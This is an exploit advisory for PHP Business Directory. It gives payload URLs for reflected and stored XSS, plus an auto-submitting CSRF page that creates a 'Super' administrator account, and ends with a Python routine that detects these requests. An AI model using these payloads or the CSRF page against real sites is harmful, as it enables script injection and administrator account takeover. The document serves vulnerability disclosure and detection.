
# Exploit Title: PHP Business Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=4
# Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip

--------------------------------------------------------------------------------

PoC as follows:

# 0x00 Reflected XSS
---

1. In the public search:

http://192.168.1.112/phpbusinessdirectory/index.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>

2. In the administration web interface (requires a normal user login):

http://192.168.1.112/phpbusinessdirectory/administration.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>

# 0x01 Stored XSS
---

1. In the administration web interface, directory section (requires a normal user login):

http://192.168.1.112/phpbusinessdirectory/administration.php
?pageaction=newsavebusiness
&subaction=submit
&businessname=<script>alert(1)</script>
&slogan=<script>alert(2)</script>
&businesslicence=<script>alert(3)</script>
&address=<script>alert(4)</script>
&city=<script>alert(5)</script>
&suburb=<script>alert(6)</script>
&businessstate=<script>alert(7)</script>
&country=<script>alert(8)</script>
&zippostcode=<script>alert(9)/*
&telephone1=*/</script><script>alert(10)</script>
&telephone2=<script>alert(11)</script>
&mobilecell=<script>alert(12)</script>
&fax=<script>alert(13)</script>
&email=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&productservice=<script>alert(19)</script>
&manager=<script>alert(20)</script>
&paymentsaccepted=<script>alert(21)</script>

2. In the administration web interface, categories section (requires an administrator login):

http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>

# 0x02 CSRF (add Super user)
---

In http://192.168.1.103/csrf.html :

<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phpbusinessdirectory/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

* Thanks to Besim *
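The three issues above share a small set of request-level indicators that a proxy, WAF or log pipeline can flag. The following detection rules are an added example written for this advisory, not the author's PoC or the product's code; the request shape (a dict with method, path, query/form dicts and optional headers) and the site host 192.168.1.112 are assumptions taken from the PoC URLs.

```python
# Added detection rules for the issues in this advisory (constructed example, not the
# product's code). A request is a dict: method, path, query/form dicts, optional headers.
import re
from urllib.parse import urlparse

APP_PATHS = ("/phpbusinessdirectory/index.php",
             "/phpbusinessdirectory/administration.php")
# Tag openers and inline event handlers never belong in these text fields.
MARKUP = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=", re.I)

def _tainted(values):
    # Names of the fields whose value contains markup.
    return [k for k, v in values.items() if MARKUP.search(v)]

def classify_request(req, site_host="192.168.1.112"):
    """Return (finding, detail) pairs; site_host is the directory's own host."""
    findings = []
    if req["path"] not in APP_PATHS:
        return findings
    params = {**req.get("query", {}), **req.get("form", {})}
    action = params.get("pageaction", "")
    # 0x00: reflected XSS through the search parameters key= and location=
    hit = _tainted({k: params[k] for k in ("key", "location") if k in params})
    if hit:
        findings.append(("reflected_xss_attempt", hit))
    # 0x01: stored XSS through the business / category save actions
    if action in ("newsavebusiness", "savecategory"):
        hit = _tainted({k: v for k, v in params.items()
                        if k not in ("pageaction", "subaction")})
        if hit:
            findings.append(("stored_xss_attempt", hit))
    # 0x02: a Super user created by a POST whose Origin/Referer is not this site
    if req["method"] == "POST" and action == "saveuser" \
            and params.get("accesslevel") == "Super":
        hdr = req.get("headers", {})
        origin = hdr.get("Origin") or hdr.get("Referer") or ""
        if urlparse(origin).hostname != site_host:
            findings.append(("csrf_superuser_suspect", origin or "no Origin/Referer"))
    return findings

# Constructed sample traffic mirroring the three PoCs above, plus a clean search.
SAMPLE = [
    {"method": "GET", "path": APP_PATHS[0],
     "query": {"key": "<svg/onload=alert(1)>", "location": "pizza"}},
    {"method": "POST", "path": APP_PATHS[1], "form": {"pageaction": "savecategory",
     "subaction": "submit", "categoryname": "</select><svg/onload=alert(1)><select>"}},
    {"method": "POST", "path": APP_PATHS[1], "headers": {"Referer": "http://192.168.1.103/csrf.html"},
     "form": {"pageaction": "saveuser", "accesslevel": "Super", "username": "larry_csrf"}},
    {"method": "GET", "path": APP_PATHS[0], "query": {"key": "plumber", "location": "Boston"}},
]
```

Access logs alone will not catch the CSRF case because POST bodies are not logged; the rule needs the form fields, which is why it is written against a proxy-level request object.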